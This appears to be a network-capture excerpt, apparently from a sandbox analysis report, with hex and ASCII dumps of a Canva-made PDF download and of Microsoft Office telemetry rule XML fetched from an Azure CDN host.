                                                                                                                            2024-11-29 07:30:39 UTC251INData Raw: 25 50 44 46 2d 31 2e 34 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 2f 4d 61 72 6b 49 6e 66 6f 20 3c 3c 0a 2f 54 79 70 65 20 2f 4d 61 72 6b 49 6e 66 6f 0a 2f 4d 61 72 6b 65 64 20 74 72 75 65 0a 3e 3e 0a 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 33 20 30 20 52 0a 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 3c 3c 0a 2f 54 79 70 65 20 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 0a 2f 44 69 73 70 6c 61 79 44 6f 63 54 69 74 6c 65 20 74 72 75 65 0a 3e 3e 0a 2f 4c 61 6e 67 20 28 65 6e 29 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 69 74 6c 65 20 28 4a 44 29 0a 2f 43 72 65 61 74 6f 72 20 28 43 61 6e 76
                                                                                                                            Data Ascii: %PDF-1.4%1 0 obj<</Type /Catalog/Pages 2 0 R/MarkInfo <</Type /MarkInfo/Marked true>>/StructTreeRoot 3 0 R/ViewerPreferences <</Type /ViewerPreferences/DisplayDocTitle true>>/Lang (en)>>endobj4 0 obj<</Title (JD)/Creator (Canv
                                                                                                                            2024-11-29 07:30:39 UTC1369INData Raw: 61 29 0a 2f 50 72 6f 64 75 63 65 72 20 28 43 61 6e 76 61 29 0a 2f 43 72 65 61 74 69 6f 6e 44 61 74 65 20 28 44 3a 32 30 32 34 31 31 31 33 31 32 34 31 31 38 2b 30 30 27 30 30 27 29 0a 2f 4d 6f 64 44 61 74 65 20 28 44 3a 32 30 32 34 31 31 31 33 31 32 34 31 31 38 2b 30 30 27 30 30 27 29 0a 2f 4b 65 79 77 6f 72 64 73 20 28 44 41 47 57 58 49 56 45 30 38 4d 2c 42 41 47 51 6b 5f 33 54 6a 35 59 29 0a 2f 41 75 74 68 6f 72 20 28 4d 61 64 67 65 20 52 79 61 6e 29 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 50 61 67 65 73 0a 2f 43 6f 75 6e 74 20 32 0a 2f 4b 69 64 73 20 5b 35 20 30 20 52 20 36 20 30 20 52 5d 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 33 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 53 74 72 75 63 74 54 72 65 65 52
                                                                                                                            Data Ascii: a)/Producer (Canva)/CreationDate (D:20241113124118+00'00')/ModDate (D:20241113124118+00'00')/Keywords (DAGWXIVE08M,BAGQk_3Tj5Y)/Author (Madge Ryan)>>endobj2 0 obj<</Type /Pages/Count 2/Kids [5 0 R 6 0 R]>>endobj3 0 obj<</Type /StructTreeR
                                                                                                                            2024-11-29 07:30:39 UTC1369INData Raw: 20 52 20 33 31 20 30 20 52 20 33 32 20 30 20 52 20 33 33 20 30 20 52 20 33 33 20 30 20 52 20 33 33 20 30 20 52 20 33 33 20 30 20 52 20 33 33 20 30 20 52 20 33 34 20 30 20 52 20 33 35 20 30 20 52 0a 33 35 20 30 20 52 20 33 35 20 30 20 52 20 33 36 20 30 20 52 20 33 37 20 30 20 52 20 33 37 20 30 20 52 20 33 37 20 30 20 52 20 33 38 20 30 20 52 20 33 39 20 30 20 52 20 33 39 20 30 20 52 20 33 39 20 30 20 52 0a 34 30 20 30 20 52 20 34 31 20 30 20 52 20 34 31 20 30 20 52 20 34 31 20 30 20 52 20 34 32 20 30 20 52 20 34 33 20 30 20 52 20 34 34 20 30 20 52 20 34 35 20 30 20 52 20 34 35 20 30 20 52 20 34 35 20 30 20 52 0a 34 36 20 30 20 52 20 34 37 20 30 20 52 20 34 37 20 30 20 52 20 34 37 20 30 20 52 20 34 38 20 30 20 52 20 34 39 20 30 20 52 20 34 39 20 30 20 52 20
                                                                                                                            Data Ascii: R 31 0 R 32 0 R 33 0 R 33 0 R 33 0 R 33 0 R 33 0 R 34 0 R 35 0 R35 0 R 35 0 R 36 0 R 37 0 R 37 0 R 37 0 R 38 0 R 39 0 R 39 0 R 39 0 R40 0 R 41 0 R 41 0 R 41 0 R 42 0 R 43 0 R 44 0 R 45 0 R 45 0 R 45 0 R46 0 R 47 0 R 47 0 R 47 0 R 48 0 R 49 0 R 49 0 R
                                                                                                                            2024-11-29 07:30:39 UTC1369INData Raw: 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 31 35 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 46 6f 6e 74 0a 2f 53 75 62 74 79 70 65 20 2f 54 79 70 65 30 0a 2f 42 61 73 65 46 6f 6e 74 20 2f 44 41 41 41 41 41 2b 48 4b 47 72 6f 74 65 73 6b 2d 52 65 67 75 6c 61 72 0a 2f 45 6e 63 6f 64 69 6e 67 20 2f 49 64 65 6e 74 69 74 79 2d 48 0a 2f 44 65 73 63 65 6e 64 61 6e 74 46 6f 6e 74 73 20 5b 39 34 20 30 20 52 5d 0a 2f 54 6f 55 6e 69 63 6f 64 65 20 39 35 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 31 36 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 34 37 39 35 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 3e 3e 0a 73 74 72 65 61 6d 0d 0a 78 9c ed 5d 5b ab 24 b9 91 7e af 5f a1 47 db b0 6a 45 28 74 83 a6 a1 4e d5 a9 61 1f 0c f6 b8 c1 cf e6 ac
                                                                                                                            Data Ascii: >>endobj15 0 obj<</Type /Font/Subtype /Type0/BaseFont /DAAAAA+HKGrotesk-Regular/Encoding /Identity-H/DescendantFonts [94 0 R]/ToUnicode 95 0 R>>endobj16 0 obj<</Length 4795/Filter /FlateDecode>>streamx][$~_GjE(tNa
                                                                                                                            2024-11-29 07:30:39 UTC543INData Raw: df 9f 7e 7f fa e9 c4 f6 92 6a 65 d1 90 d4 39 1b ac f4 df c0 d6 a2 23 8b 1c a1 40 d4 d9 b2 f2 4d db 95 3e 78 d1 fe fa fe 3b b1 48 f9 96 94 80 04 13 b4 a3 90 c9 e9 1e b5 21 69 b5 b7 51 85 55 d2 6b f4 98 a8 b3 a8 8d 90 e0 d0 08 a9 8c cf 04 de 25 36 1a c7 f5 27 d4 f5 c7 09 b0 26 ae c4 71 38 fb 45 48 09 d0 bc 3d 2b 5a 8c 0f 32 68 52 e1 6e 39 f1 41 2a 22 67 ee b4 98 80 32 c4 59 73 37 cf b4 93 16 29 d8 26 b2 50 cc 48 71 25 8d 5a 8c 59 0a b3 27 09 a0 95 ba 5b 4c 1c 44 e5 ca db bb 45 d9 05 a9 20 18 dd 69 30 b9 23 56 4b a7 43 ec df 62 29 21 25 bd f1 81 fc 72 f9 0b 28 0d 02 d2 72 2a 18 2f bd 72 1a f0 71 4d 03 af fc 72 12 8f 53 c7 1b 99 6c 7c 3a 28 a9 82 02 23 40 93 d4 2e fe eb 64 2f 39 12 1d 51 20 9d 05 a7 3d 0d 55 80 75 ee 7d 62 83 01 a5 8d 5b 49 a1 c4 97 ee 09 95
                                                                                                                            Data Ascii: ~je9#@M>x;H!iQUk%6'&q8EH=+Z2hRn9A*"g2Ys7)&PHq%ZY'[LDE i0#VKCb)!%r(r*/rqMrSl|:(#@.d/9Q =Uu}b[I
                                                                                                                            2024-11-29 07:30:39 UTC1369INData Raw: 6c 42 82 d0 a4 0e 78 a1 4d 9c 26 44 c8 25 ad 2e b9 5f 4e da 87 c2 7f 4d be d4 a7 41 09 ad 7d c9 83 51 d8 4b dd be 96 03 8d b9 76 ec 92 0d b2 34 b6 ca d4 d0 1c 38 09 89 9e dc a6 01 16 c8 a8 d5 0c f3 e1 e5 f4 97 c4 e4 d2 2d 34 49 66 e2 3c 69 a9 68 89 49 ae 69 e0 e1 3e 0d 31 f1 1f bc 78 39 a1 83 38 7d 48 c9 22 26 48 20 51 80 71 79 3d 43 d1 e4 0c 5c 9e 22 18 cb b5 54 9f fb 89 83 4c 42 a0 b8 92 a4 51 6b a9 1a b1 48 67 19 0b 8c f5 3b 69 cb 13 74 5c 86 45 da cb 09 93 58 76 b9 9c 2d 6c d0 a8 79 34 57 98 14 99 07 d6 d7 74 2d 8d f8 d2 a5 60 9d ae be b2 4d 8f cf 45 8e 94 8d c9 a6 08 09 25 e1 74 99 4d 40 21 67 a6 5e 92 23 63 39 2f 16 79 08 65 11 e1 f4 dc 56 4b 40 d4 55 94 bb e4 d6 9f 98 1c 12 cf 42 72 52 30 cb 4d e0 39 1a 13 b3 dc 2f fb 1d 79 81 0e cb 5b 43 2c 71 5f
                                                                                                                            Data Ascii: lBxM&D%._NMA}QKv48-4If<ihIi>1x98}H"&H Qqy=C\"TLBQkHg;it\EXv-ly4Wt-`ME%tM@!g^#c9/yeVK@UBrR0M9/y[C,q_
                                                                                                                            2024-11-29 07:30:39 UTC1369INData Raw: 38 35 f0 a0 4c de 95 3a 54 f3 f1 9e db 77 6c 8d 1f dd b3 68 54 f7 d4 f9 fe 3c 1a 3c d0 8a 10 68 bf bd a4 66 3e 34 a3 43 33 3a 34 a3 43 33 7a a0 19 cd ed 25 f1 f2 84 89 db 9a b2 1d a5 80 40 3e 31 6e 1f db 45 6c 8b 25 c8 20 60 06 4d 20 b5 b1 a2 49 4d 0f cf e1 cc 46 42 f1 ec 60 5c 14 6b 7f 9a 8d 04 9a 66 71 e3 76 55 07 b4 d7 01 f8 fa 43 b4 cd 38 6e d6 79 d3 01 64 3b 97 ad ea bb 61 eb 7c e9 00 a4 e3 5d d3 2a d5 e0 55 29 ed 4d ce a6 4f ed 25 41 86 64 33 aa fc 98 9f 73 9f db 4b 2c 5f d5 51 19 f9 f6 81 1d 3a 5b 99 cc 28 d9 31 fb 4e 4b ea c2 1d 66 a1 12 18 0f 1a 74 06 2a d6 8e 8a 11 ea bd 9e b4 5e 0b 66 32 1f 9a 39 10 fd 5e 33 47 c9 7a 80 f9 01 e6 07 98 1f 60 3e 07 73 3d 37 73 38 a5 bb 60 46 be d2 86 01 aa ec c8 86 20 be 3d e6 05 3d 31 2f 80 b5 d2 a3 8f fd a9 8d
                                                                                                                            Data Ascii: 85L:TwlhT<<hf>4C3:4C3z%@>1nEl% `M IMFB`\kfqvUC8nyd;a|]*U)MO%Ad3sK,_Q:[(1NKft*^f29^3Gz`>s=7s8`F ==1/
                                                                                                                            2024-11-29 07:30:39 UTC1369INData Raw: 3f 41 52 33 1f 28 7b a0 ec 81 b2 07 ca 3e 40 d9 f9 9d 0f e9 d3 62 cd 4c cf a1 d1 1c c5 85 93 af 6d 9b 89 b9 15 e2 57 a2 e3 27 fe 6a f5 ed 7b 14 8c 5f a6 33 2c 9e 87 bd f8 78 bd 20 ad 91 d5 45 3c db 76 64 ef f9 3a 2c bc fd 77 2b 96 1f 4b 5f c3 d2 fe b6 ec 8a 67 0b 0c ce fb e6 b0 6a 35 af a7 4c 37 6e 06 5b dd ab bf c5 b8 1a 4f b5 de f7 63 7b 88 ec e4 5e 08 17 bf d8 94 ee 85 68 83 34 c5 52 3b bf 18 02 80 ed eb 2d 16 ce 36 67 c5 9e 93 94 da d7 c9 b0 03 07 fd 8e b9 70 e0 e0 81 83 07 0e 1e 38 78 15 76 7e 5d 02 40 35 10 83 fe 5a 23 5d d9 3f 4d 96 d2 d9 35 0a 68 a5 a6 0c 9e 77 c6 e1 05 78 ee 3e 17 ff f5 86 c7 61 4f d8 df e9 1c 9d 97 fd c7 2b 18 97 79 c3 54 6e 74 18 02 8a 87 8d d4 75 70 78 0e d8 58 f2 0e 5f 90 d8 f1 55 a2 b6 1f 36 4d 27 e8 bd d7 e3 ad 13 db ec 78
                                                                                                                            Data Ascii: ?AR3({>@bLmW'j{_3,x E<vd:,w+K_gj5L7n[Oc{^h4R;-6gp8xv~]@5Z#]?M5hwx>aO+yTntupxX_U6M'x
                                                                                                                            2024-11-29 07:30:39 UTC1369INData Raw: 5b 71 f0 eb 9c da 8c 09 32 0b 71 56 42 b4 7a f5 75 13 a5 b9 44 31 ef 71 cb 71 c1 09 9b ec 51 2b 3e 3c 0b 83 c9 ff 57 4a d7 f3 f0 f5 71 b6 6c fe 3d fa 51 04 fd 80 ed a0 8f 60 60 32 ee a9 27 0e 30 1c 5c 72 66 04 04 11 0f c6 73 44 8c 8d 31 74 47 e4 18 c3 71 3c 06 a6 fe d4 76 38 a5 7e 10 87 f2 5c 6e 9f 01 b3 2c 04 2f 35 37 e0 05 34 31 80 15 f9 9c bf 29 08 6f 25 17 69 ec ed a2 d0 bb 44 01 21 06 fb cc 49 90 99 9b d3 65 99 93 aa 4e ad 35 0f 4e b8 aa 4f 09 92 ef 51 a7 f6 92 eb 38 6e 3f 13 a6 31 61 06 4c 28 55 54 77 49 ea 03 51 54 16 d5 72 54 e9 33 c0 85 aa 77 a4 a6 c6 5e d3 d3 16 83 a8 a6 3b 58 b4 bb 58 94 e7 a4 97 a4 ab c8 5a d4 d3 c1 b6 b6 c4 a2 d0 f1 a0 27 c4 f1 94 da a2 95 46 91 b4 67 84 40 51 34 eb 3d 95 b1 87 36 2e 89 2e da 42 a4 5f ec a1 3e 1f 0f 35 ed f9
                                                                                                                            Data Ascii: [q2qVBzuD1qqQ+><WJql=Q``2'0\rfsD1tGq<v8~\n,/5741)o%iD!IeN5NOQ8n?1aL(UTwIQTrT3w^;XXZ'Fg@Q4=6..B_>5
                                                                                                                            2024-11-29 07:30:39 UTC1369INData Raw: f9 75 c4 51 d4 b8 0e 54 09 2e 18 b5 47 79 43 3d 13 dd a3 3d a0 8d 34 cb a1 92 25 36 86 76 d7 6c 11 cd 53 65 35 62 c5 ef 57 dd 79 dd 0b 81 dc 7a 65 cb 86 b8 9b 88 59 32 66 74 ba b3 80 27 b7 9a 7e 5f 3e b6 cc 56 81 07 51 7f 85 5b 03 70 a5 d3 31 a6 2d 06 2e 05 aa c4 23 c5 93 6a 47 05 0a 8d 72 ff a1 2d b0 c2 9c ae ca 52 a2 79 57 b1 a3 80 bb 9e cd 96 19 5a 3c d2 12 40 bf 0e 9d fe d6 41 27 49 a1 53 cd e4 2e a0 b3 3e 93 32 9f ae 64 87 eb 52 1b 90 71 7d 01 69 8e 0a ab 68 8e 1a fb b6 0a 44 32 ac eb cb c9 16 88 c4 0e b8 a6 c4 3a a9 64 80 a6 5c 9c ae 19 df a5 14 3e a6 e5 7b 64 d6 98 a9 87 ab 5a 2d 4b 28 4d a3 10 67 a8 0f 9f 3d a0 cd 5c 4e a4 d2 76 68 07 ba f9 61 6d 19 ed d5 e8 9c f6 d7 3d 61 3c 6c b8 f1 23 88 3f 82 f8 23 88 3f 82 78 da 43 61 23 88 bb 96 8c ba 0e d0
                                                                                                                            Data Ascii: uQT.GyC==4%6vlSe5bWyzeY2ft'~_>VQ[p1-.#jGr-RyWZ<@A'IS.>2dRq}ihD2:d\>{dZ-K(Mg=\Nvham=a<l#?#?xCa#


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            8192.168.2.54971213.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:38 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:38 UTC471INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:38 GMT
                                                                                                                            Content-Type: text/plain
                                                                                                                            Content-Length: 218853
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public
                                                                                                                            Last-Modified: Wed, 27 Nov 2024 15:11:14 GMT
                                                                                                                            ETag: "0x8DD0EF5BC53602D"
                                                                                                                            x-ms-request-id: a5a19dc6-401e-008c-1dff-4086c2000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073038Z-174f7845968kvnqxhC1EWRmf3g0000000kf0000000002fw5
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:38 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                            Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                            2024-11-29 07:30:39 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                            Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                            2024-11-29 07:30:39 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                            Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                            2024-11-29 07:30:39 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                            Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                            2024-11-29 07:30:39 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                            Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                            2024-11-29 07:30:39 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                            Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                            2024-11-29 07:30:39 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                            Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                            2024-11-29 07:30:39 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                            Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
